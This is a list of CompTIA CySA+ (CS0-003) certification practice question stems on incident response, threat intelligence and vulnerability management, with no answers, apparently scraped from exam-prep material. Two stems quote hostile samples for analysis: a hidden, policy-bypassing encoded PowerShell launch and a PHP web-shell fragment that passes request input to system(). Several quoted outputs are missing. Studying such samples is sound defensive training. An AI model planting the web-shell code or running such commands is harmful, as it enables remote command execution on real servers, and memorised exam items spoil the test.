COMPTIA-CYSA

CompTIA's CS0-003 Which of the following documents sets requirements and metrics for a third-party response during an event?

CompTIA's CS0-003 A SOC analyst wants to improve the proactive detection of malicious emails before they are delivered to the destination inbox. Which of the following is the best approach the SOC analyst can recommend?

CompTIA's CS0-003 Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

CompTIA's CS0-003 An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?

CompTIA's CS0-003 A manufacturing company’s assembly line machinery only functions on an end-of-life OS. Consequently, no patches exist for several highly exploitable OS vulnerabilities. Which of the following is the best mitigating control to reduce the risk of these current conditions?

CompTIA's CS0-003 Which of the following will most likely cause severe issues with authentication and logging?

CompTIA's CS0-003 Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades. Which of the following is the best method to remediate the bugs?

CompTIA's CS0-003 A company is in the middle of an incident, and customer data has been breached. Which of the following should the company contact first?

CompTIA's CS0-003 A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?

CompTIA's CS0-003 A Chief Information Security Officer wants to lock down the users’ ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?

CompTIA's CS0-003 An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?

CompTIA's CS0-003 A Chief Finance Officer receives an email from someone who is possibly impersonating the company’s Chief Executive Officer and requesting a financial operation. Which of the following should an analyst use to verify whether the email is an impersonation attempt?

CompTIA's CS0-003 An analyst is investigating a phishing incident and has retrieved the following as part of the investigation:cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -EncodedCommand Which of the following should the analyst use to gather more information about the purpose of this command?

CompTIA's CS0-003 An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

CompTIA's CS0-003 When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

CompTIA's CS0-003 A security analyst reviews the following results of a Nikto scan:Which of the following should the security administrator investigate next?

CompTIA's CS0-003 Which of the following explains the importance of a timeline when providing an incident response report?

CompTIA's CS0-003 An auditor is reviewing an evidence log associated with a cyber crime. The auditor notices that a gap exists between individuals who were responsible for holding onto and transferring the evidence between individuals responsible for the investigation. Which of the following best describes the evidence handling process that was not property followed?

CompTIA's CS0-003 A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral IoCs. Which of the following should be configured in order to resolve this issue?

CompTIA's CS0-003 Which of the following responsibilities does the legal team have during an incident management event? (Choose two). E. Conduct computer and network damage assessments for insurance. F. Verify that all security personnel have the appropriate clearances.

CompTIA's CS0-003 Which of the following characteristics ensures the security of an automated information system is the most effective and economical?

CompTIA's CS0-003 Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and improvement process?

CompTIA's CS0-003 An analyst has discovered the following suspicious command:"; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?>Which of the following would best describe the outcome of the command?

CompTIA's CS0-003 A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. Which of the following inhibitors to remediation is the company utilizing?

CompTIA's CS0-003 Which of the following attributes is part of the Diamond Model of Intrusion Analysis?

CompTIA's CS0-003 An analyst is creating the final vulnerability report for one of the company’s customers. The customer asks for a scanning profile with a CVSS score of 7 or higher. The analyst has confirmed there is no finding for missing database patches, even if false positives have been eliminated by manual checks. Which of the following is the most probable reason for the missing scan result?

CompTIA's CS0-003 Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?

CompTIA's CS0-003 A security analyst is improving an organization’s vulnerability management program. The analyst cross-checks the current reports with the system’s infrastructure teams, but the reports do not accurately reflect the current patching levels. Which of the following will most likely correct the report errors?

CompTIA's CS0-003 A threat intelligence analyst is updating a document according to the MITRE ATT&CK framework. The analyst detects the following behavior from a malicious actor:“The malicious actor will attempt to achieve unauthorized access to the vulnerable system.”In which of the following phases should the analyst include the detection?

CompTIA's CS0-003 An analyst receives alerts that state the following traffic was identified on the perimeter network firewall:Which of the following best describes the indicator of compromise that triggered the alerts?